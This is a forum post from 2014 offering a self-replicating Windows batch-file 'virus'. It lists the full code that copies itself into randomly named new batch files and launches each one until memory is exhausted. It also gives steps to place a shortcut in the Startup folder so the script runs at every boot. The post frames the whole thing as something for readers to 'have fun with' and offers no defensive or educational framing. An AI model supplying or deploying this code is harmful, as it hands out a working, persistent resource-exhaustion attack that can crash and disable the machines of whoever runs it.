Post: [.BAT Virus]How to Overload memory with an .Bat File
12-10-2014, 10:07 PM #1
EncepT
I defeated!
(adsbygoogle = window.adsbygoogle || []).push({}); Explantion:This batch file creates another batch file in the same directory then copies itself into each of these newly created files.
these files are then started up.
of course they are identical so both of them start up again and repeat until the computer runs out of memory(or the antivirus catch it).

Soo Lets get started:

Step 1: Open a text editor like Notepad.


Step 2: type in the following code:
    
@echo of
:A
SET /A x=%RANDOM%%%1999999999%
type 1337HaXor.bat >> %x%.bat
start %x%.bat
goto A


Step 3: Save the file as 1337HaXor.bat and we´re done!


Step 4 (Optional): To make this file execute automatically at startup,Do the following.
Create a shortcut of the 1337HaXor.Bat by right clicking on it.
Open the start menu in programms Open start up folder and simply drag the Shortcut into it.


P.S: it can be detected from Anti Virus software.

Have fun with it guys

-AnRiiLiix

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo